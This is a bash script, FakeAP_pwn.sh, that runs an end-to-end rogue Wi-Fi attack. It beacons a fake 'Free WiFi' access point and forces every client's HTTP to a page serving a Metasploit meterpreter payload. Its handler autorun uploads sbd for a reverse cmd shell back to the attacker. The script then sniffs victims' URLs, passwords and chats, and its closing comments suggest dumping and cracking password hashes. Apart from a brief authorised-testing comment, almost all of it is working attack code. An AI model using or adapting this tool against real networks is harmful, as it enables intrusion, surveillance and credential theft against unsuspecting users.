FakeAP_pwn.sh

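#!/bin/bash
#
# FakeAP_pwn.sh
#
# (C)opyright 2009 - g0tmi1k
#
# Brings up a rogue access point ("Free WiFi") on $fakeap_interface, hands
# out DHCP leases to clients on the at0 tap device, redirects every client's
# HTTP to a local Apache page serving a meterpreter payload, waits until the
# handler's autorun script drops a sentinel file, then restores plain NAT so
# the client gets its internet back while urlsnarf/dsniff/msgsnarf watch the
# uplink.
#
# Must run as root (modprobe, ifconfig, route, iptables, dhcpd).  External
# tools expected: airbase-ng, dhcpd3, apache2, msfpayload/msfcli, sbd,
# urlsnarf, dsniff, msgsnarf, xterm, konsole.
#
# NOTE(review): this is an attack tool.  Only point it at networks and
# clients you are explicitly authorised to test.

set -u   # an unset variable here is a typo, not a valid configuration

# ---------------------------------------------------------------- Settings --
gatewayip=192.168.1.1                 # upstream resolver the clients' DNS is sent to
internet_interface=wlan0              # interface with real internet access
fakeap_interface=wlan1                # interface airbase-ng beacons on
export gatewayip internet_interface fakeap_interface

fakeap_ip=10.0.0.1                    # our address on at0; also LHOST and the web server
fakeap_net=10.0.0.0
fakeap_mask=255.255.255.0
conf_dir=/root/FakeAP_pwn             # dhcpd.conf and fakeap_pwn.rb live here
msf_dir=/pentest/exploits/framework3  # metasploit 3 install (BackTrack layout)
www_dir=/var/www                      # apache document root
payload_name=MS016455.exe             # file name the landing page must link to
sbd_key=g0tmi1k                       # sbd shared key (-k); must match the command fakeap_pwn.rb runs on the target
sbd_port=7332                         # sbd listen port; likewise must match fakeap_pwn.rb
sentinel=/tmp/FakeAP_pwn.tmp          # presumably touched by fakeap_pwn.rb once a session lands - verify

#######################################
# Reset iptables and install plain NAT for the clients behind at0.
# Called once before the HTTP hijack is added and again afterwards; the
# flush is what removes the port-80 DNAT the second time round.
# Globals:  gatewayip, internet_interface (read)
# Returns:  status of the last iptables call
#######################################
setup_forwarding() {
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain

  echo 1 > /proc/sys/net/ipv4/ip_forward

  # Hand the clients' DNS to the real gateway's resolver.  Restricted to port
  # 53: the original matched every UDP packet, which also dragged NTP, VoIP
  # and the like to an address that will not answer them.
  iptables --table nat --append PREROUTING -p udp --dport 53 -j DNAT --to-destination "$gatewayip"

  # Client traffic out, replies back.  The second rule only matters when the
  # FORWARD policy is DROP (the original silently relied on the default ACCEPT).
  iptables --append FORWARD --in-interface at0 -j ACCEPT
  iptables --append FORWARD --out-interface at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  iptables --table nat --append POSTROUTING --out-interface "$internet_interface" -j MASQUERADE
}

echo "[>] Starting: FakeAP_pwn - g0tmi1k"

if [[ $EUID -ne 0 ]]; then
  echo "[!] This script needs root (iptables/ifconfig/dhcpd)." >&2
  exit 1
fi

# ------------------------------------------------------------------ FakeAP --
echo "[+] Setting up FakeAP"
modprobe tun   # airbase-ng creates the at0 tap device

xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" "$fakeap_interface" -v &

# at0 only exists once airbase-ng is running; the fixed two-second sleep the
# original used was a race on slower machines.  Wait up to ten seconds.
for attempt in {1..10}; do
  ifconfig at0 >/dev/null 2>&1 && break
  sleep 1
done
if ! ifconfig at0 >/dev/null 2>&1; then
  echo "[!] at0 never appeared - did airbase-ng start on $fakeap_interface?" >&2
  exit 1
fi

# ------------------------------------------------------------------ Tables --
echo "[+] Setting up forwarding tables..."
ifconfig lo up
ifconfig at0 up
ifconfig at0 "$fakeap_ip" netmask "$fakeap_mask"
ifconfig at0 mtu 1400   # kept from the original; presumably to avoid fragmentation over the tap link
route add -net "$fakeap_net" netmask "$fakeap_mask" gw "$fakeap_ip"
setup_forwarding

# -------------------------------------------------------------------- DHCP --
echo "[+] Setting up DHCP server..."
xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf "$conf_dir/dhcpd.conf" at0 &
sleep 2

# --------------------------------------------------- Need the user to come here
echo "[+] Start web server..."
#xterm -geometry 75x25+1+200  -T WebServer -e sh -c "start-apache"&
xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
sleep 2

# So lets force them: every outbound HTTP request from a client lands on our Apache.
echo "[+] Force user to visit our site..."
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to "$fakeap_ip"

# ------------------------------------------------------------ Bad boy stuff --
echo "[+] Here comes metasploit..."
cd "$msf_dir" || { echo "[!] $msf_dir not found" >&2; exit 1; }

# Stage the payload where the landing page serves it from.  Without this check
# a failed msfpayload left an empty .exe behind and the rest carried on.
if ! ./msfpayload windows/meterpreter/reverse_tcp LHOST="$fakeap_ip" X > "$www_dir/$payload_name"; then
  echo "[!] msfpayload failed - $www_dir/$payload_name is not usable" >&2
  exit 1
fi

echo "[+] Uploading SBD..."
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$fakeap_ip" AutoRunScript="$conf_dir/fakeap_pwn.rb" E &
sleep 2

# What fakeap_pwn.rb is expected to do on the target (kept from the original):
#   upload //root/FakeAP_pwn/ C:/
#   execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
# The -k and -p there must match $sbd_key / $sbd_port above.
# Alternative: ./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# ------------------------------------------------ Wait till user is connected
echo "[-] Waiting for target to connect..."
rm -f -- "$sentinel"   # a stale sentinel from a previous run would end the wait instantly
# NOTE(review): fixed, predictable path under /tmp polled by a root process;
# another local user could pre-create it and release the wait early.  Kept
# because fakeap_pwn.rb must agree on the name - move both to a root-only
# directory if that matters in your environment.
while [[ ! -e "$sentinel" ]]; do
  sleep 1
done

# They give us access to their system, so lets give them internet back ;)
echo "[+] Give them (our) internet back..."
# The at0 route from the setup phase is untouched by the iptables flush, so
# the original's second `route add` (which only reported "File exists") is gone.
setup_forwarding

# ------------------------------------------------------------ Lets connect! =)
# *** If the upload step in fakeap_pwn.rb is edited, this could be swapped for VNC. ***
echo "[+] Lets us back in..."
konsole -T BackDoor -e sbd -l -k "$sbd_key" -p "$sbd_port" &
sleep 2

# ------------------------------------------------- Get as much info as poss!
echo "[+] Watch what they do..."
# All three sniff the uplink (the original hard-coded wlan0 here instead of
# reusing the setting; behaviour is identical with the default).
xterm -geometry 100x10+470+0   -T URLs      -e urlsnarf -i "$internet_interface" &   # URLs
xterm -geometry 100x10+470+150 -T Passwords -e dsniff   -i "$internet_interface" &   # Passwords
xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i "$internet_interface" &   # IM chats

echo
echo "[+] DONE - Have you, g0tmi1k?"

# Things worth pulling from the meterpreter session whilst we are at it:
#   sysinfo
#   getuid
#   use priv
#   hashdump > /tmp/FakeAP_pwn-hash.txt
#   session -l
#   session -i 1
# Then crack the hashes:
#   cd /pentest/passwords/jtr/
#   ./john /tmp/FakeAP_pwn-hash.txt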